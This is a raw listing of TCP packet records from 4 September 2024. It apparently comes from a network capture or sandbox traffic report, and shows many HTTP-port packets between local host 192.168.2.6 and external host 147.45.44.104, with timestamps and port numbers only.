Sep 4, 2024 17:37:08.131182909 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.131186962 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.131195068 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.131195068 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.131207943 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.131217957 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.131218910 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.131227970 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.131237030 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.131247997 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.131261110 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.131269932 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.131273985 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.131294966 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.131300926 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.131764889 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.131774902 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.131800890 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.131813049 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.131901026 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.131912947 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.131922960 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.131931067 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.131932974 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.131941080 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.131944895 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.131964922 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.131964922 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.131978989 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.132090092 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.132103920 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.132113934 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.132123947 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.132128000 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.132133961 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.132136106 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.132143021 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.132144928 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.132153988 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.132160902 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.132160902 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.132179022 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.132194042 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.132224083 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.132236004 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.132250071 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.132260084 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.132260084 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.132267952 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.132272005 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.132282972 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.132292986 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.132304907 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.132437944 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.132450104 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.132458925 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.132467985 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.132471085 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.132478952 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.132486105 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.132493019 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.132499933 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.132509947 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.132510900 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.132522106 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.132529020 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.132533073 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.132541895 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.132549047 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.132551908 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.132559061 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.132587910 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.132905960 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.132941961 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.133100986 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.133111000 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.133119106 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.133127928 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.133132935 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.133137941 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.133152008 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.133158922 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.133161068 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.133167028 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.133174896 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.133184910 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.133188963 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.133194923 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.133198977 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.133212090 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.133229017 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.133230925 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.133243084 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.133254051 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.133263111 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.133264065 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.133274078 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.133274078 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.133289099 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.133296013 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.133313894 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.133367062 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.133378983 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.133387089 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.133397102 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.133405924 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.133407116 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.133419991 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.133425951 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.133446932 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.133457899 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.133941889 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.133954048 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.133971930 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.133980036 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.133985996 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.133987904 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.133996010 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.134006023 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.134011030 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.134011030 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.134025097 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.134037971 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.134325981 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.134335995 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.134346008 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.134356976 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.134361029 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.134366989 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.134367943 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.134380102 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.134383917 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.134391069 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.134402037 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.134406090 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.134413004 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.134422064 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.134426117 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.134444952 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.134452105 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.134483099 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.134495020 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.134504080 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.134515047 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.134517908 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.134526014 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.134541035 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.134552002 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.134668112 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.134680033 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.134687901 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.134697914 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.134701967 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.134708881 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.134717941 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.134717941 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.134718895 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.134728909 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.134736061 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.134740114 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.134751081 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.134752035 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.134776115 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.134789944 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.135111094 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.135148048 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.135309935 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.135320902 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.135329008 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.135338068 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.135346889 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.135346889 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.135358095 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.135366917 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.135366917 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.135366917 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.135377884 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.135380030 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.135391951 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.135400057 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.135400057 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.135401011 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.135411978 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.135416031 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.135421991 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.135423899 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.135432959 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.135438919 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.135452986 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.135457993 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.135466099 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.135473967 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.135478020 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.135484934 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.135488033 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.135494947 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.135495901 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.135508060 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.135514975 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.135518074 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.135519981 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.135529995 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.135538101 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.135545015 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.135559082 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.135567904 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.135612011 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.135641098 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.136099100 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.136110067 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.136117935 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.136128902 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.136135101 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.136138916 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.136141062 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.136149883 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.136153936 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.136158943 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.136166096 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.136188030 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.136208057 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.136369944 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.136383057 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.136392117 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.136404037 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.136404991 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.136414051 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.136419058 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.136419058 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.136434078 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.136452913 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.136511087 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.136523008 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.136532068 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.136540890 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.136544943 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.136550903 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.136553049 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.136562109 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.136571884 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.136571884 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.136594057 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.136612892 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.136648893 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.136657953 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.136666059 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.136676073 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.136683941 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.136686087 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.136697054 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.136698961 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.136708975 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.136718988 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.136719942 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.136729956 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.136744022 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.136748075 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.136748075 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.136748075 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.136780977 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.137123108 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.137137890 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.137147903 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.137161970 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.137177944 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.137177944 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.137255907 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.137265921 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.137300968 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.137335062 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.137350082 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.137357950 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.137373924 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.137384892 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.137540102 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.137553930 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.137562990 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.137572050 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.137581110 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.137583971 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.137593985 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.137600899 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.137603998 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.137614965 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.137620926 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.137620926 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.137626886 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.137638092 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.137648106 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.137650967 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.137650967 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.137650967 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.137659073 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.137670040 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.137676001 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.137685061 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.137686014 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.137696981 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.137706041 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.137707949 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.137726068 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.137743950 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.138303041 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.138314009 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.138322115 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.138330936 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.138340950 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.138340950 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.138360977 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.138360977 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.138454914 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.138468027 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.138474941 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.138484001 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.138493061 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.138493061 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.138504982 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.138516903 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.138516903 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.138536930 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.138653994 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.138665915 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.138674974 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.138684034 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.138691902 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.138694048 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.138699055 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.138705969 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.138715982 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.138717890 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.138726950 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.138736963 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.138740063 CEST	49719	80	192.168.2.6	147.45.44.104
